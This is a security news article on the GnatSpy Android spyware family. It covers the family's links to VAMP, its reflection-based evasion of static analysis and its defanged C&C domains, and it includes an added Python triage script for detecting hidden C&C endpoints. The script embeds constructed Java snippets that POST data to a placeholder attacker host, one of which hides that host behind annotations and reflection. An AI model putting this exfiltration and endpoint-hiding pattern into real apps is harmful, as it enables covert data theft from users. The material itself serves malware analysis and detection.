New GnatSpy Mobile Malware Family Found with More Capabilities

A new mobile malware family called GnatSpy has been detected and is believed to be the latest variant of VAMP; the researchers detect it as ANDROIDOS_GNATSPY. Because some of the command-and-control (C&C) domains used by VAMP are reused in GnatSpy samples, the attackers behind Two-tailed Scorpion/APT-C-23 are assumed to be building out their next large-scale mobile malware family.

VAMP was an Android malware family focused on stealing images, contacts, text messages and other data from victims' phones, which suggests that GnatSpy likewise aims to harvest information by tricking Android users into installing it.

Although the structure of the new GnatSpy variants differs from that of the old ones, several capabilities are similar. The threat actors have added more receivers and services, making the new variants both more capable and more modular. The old and new receivers and services are shown in the screenshots below:

[Figure: GnatSpy receivers and services]

Trend Micro's analysis of the new code found that the threat actors make heavy use of Java annotations and reflection, which makes it considerably harder for static analysis to flag GnatSpy variants as malicious.

[Figure: Java annotations and reflection methods]

In earlier variants, the C&C server address was embedded in the app's code in a form that static analysis tools could pick up easily. In the new variants it is no longer straightforward to recover the server from the code.
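To make the static-analysis point concrete, the following Python triage helper is an added example (not code from Trend Micro's report and not GnatSpy's own code). It runs a string-based check over two constructed decompiled-Java snippets: an old-style one with the C&C URL as a plain literal, and a new-style one in which the host is carried in a custom annotation and the network calls go through reflection. The placeholder domain c2.example.com, the `@Endpoint` annotation and the way it splits the host into parts are assumptions made for this illustration, not GnatSpy's actual mechanism.

```python
"""Static triage of decompiled Android source: hard-coded C&C vs. reflection.

Constructed example for illustration; not Trend Micro tooling, not GnatSpy code.
"""
import re
from dataclasses import dataclass

# Constructed decompiled-Java snippets standing in for an old-style and a
# new-style variant. c2.example.com is a placeholder, not a real indicator.
OLD_STYLE = '''
public class Net {
    private static final String SERVER = "http://c2.example.com/api/upload";
    public static void send(byte[] data) throws Exception {
        HttpURLConnection c = (HttpURLConnection) new URL(SERVER).openConnection();
        c.setRequestMethod("POST");
        c.getOutputStream().write(data);
    }
}
'''

# Hypothetical @Endpoint annotation holds the host as separate labels, so no
# URL or domain literal ever appears; java.net.URL is reached via reflection.
NEW_STYLE = '''
@Endpoint(parts = {"c2", "example", "com"}, path = "api/upload")
public class Net {
    public static void send(byte[] data) throws Exception {
        Endpoint e = Net.class.getAnnotation(Endpoint.class);
        String host = String.join(".", e.parts());
        Class<?> k = Class.forName("java.net." + "U" + "RL");
        Object url = k.getConstructor(String.class).newInstance("http://" + host + "/" + e.path());
        Object conn = k.getMethod("openConnection").invoke(url);
        conn.getClass().getMethod("setRequestMethod", String.class).invoke(conn, "POST");
    }
}
'''

URL_RE = re.compile(r'https?://[\w.-]+(?:/[\w./-]*)?')
# Bare domain: at least two labels plus a TLD from a short list (lowercase only).
DOMAIN_RE = re.compile(r'\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\.(?:com|net|info|org)\b')
# Custom annotations with arguments, e.g. "@Endpoint(" at the start of a line.
ANNOTATION_RE = re.compile(r'^\s*@([A-Z]\w*)\s*\(', re.M)
# Reflection cannot hide the target method name: it has to be a string literal.
REFLECTED_NAME_RE = re.compile(r'\.get(?:Declared)?Method\(\s*"([^"]+)"')
REFLECTION_MARKERS = ("Class.forName(", ".getMethod(", ".getDeclaredMethod(",
                      ".invoke(", ".getConstructor(", ".newInstance(", ".getAnnotation(")


@dataclass
class Triage:
    literals: list        # URLs and bare domains found as string literals
    annotations: list     # custom annotation names carrying arguments
    reflection: dict      # reflection API marker -> occurrence count
    reflected_names: list # method names passed to getMethod/getDeclaredMethod


def triage(source: str) -> Triage:
    """Collect the indicators a string-based static check can see in `source`."""
    literals = sorted(set(URL_RE.findall(source)) | set(DOMAIN_RE.findall(source)))
    annotations = ANNOTATION_RE.findall(source)
    reflection = {m: source.count(m) for m in REFLECTION_MARKERS}
    return Triage(literals, annotations, reflection, REFLECTED_NAME_RE.findall(source))


def verdict(t: Triage) -> str:
    """Heuristic summary; the threshold of three reflection calls is arbitrary."""
    if t.literals:
        return "hard-coded endpoint"
    if sum(t.reflection.values()) >= 3 or t.annotations:
        return "reflection-heavy: resolve endpoint dynamically"
    return "no network indicators"


if __name__ == "__main__":
    for name, src in (("old-style", OLD_STYLE), ("new-style", NEW_STYLE)):
        t = triage(src)
        print(f"{name}: {verdict(t)}")
        print(f"  literals: {t.literals}")
        print(f"  custom annotations: {t.annotations}")
        print(f"  reflection calls: {sum(t.reflection.values())} -> {t.reflected_names}")
```

The old-style snippet yields the URL and domain directly, so a literal grep is enough. The new-style snippet yields no URL or domain at all, which is exactly why signature-style static checks lose the C&C; what remains visible is the reflection API itself, the custom annotation holding configuration, and the method names reflection is forced to spell out as strings ("openConnection", "setRequestMethod"), which are the analyst's next pivot before falling back to dynamic analysis of the running sample.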

How the threat actors deliver the malicious apps to victims' devices is still unknown. They may be distributed disguised as genuine updates to well-known apps; the names given to the malicious apps are chosen so that users do not question their authenticity and download and install them without hesitation.

The C&C domains are being examined as part of the investigation, but registrant information is unavailable, as the threat actors appear to have used domain privacy services. Some of the C&C domains were registered only recently.

Trend Micro's researchers also encountered two C&C domains, cecilia-gilbert[.]com and lagertha-lothbrok[.]info, previously reported in connection with VAMP and FrozenCell respectively.

GnatSpy reportedly targets Huawei and Xiaomi devices, among others, running Android Marshmallow and Nougat.

We shall update the article if we find more information about GnatSpy.
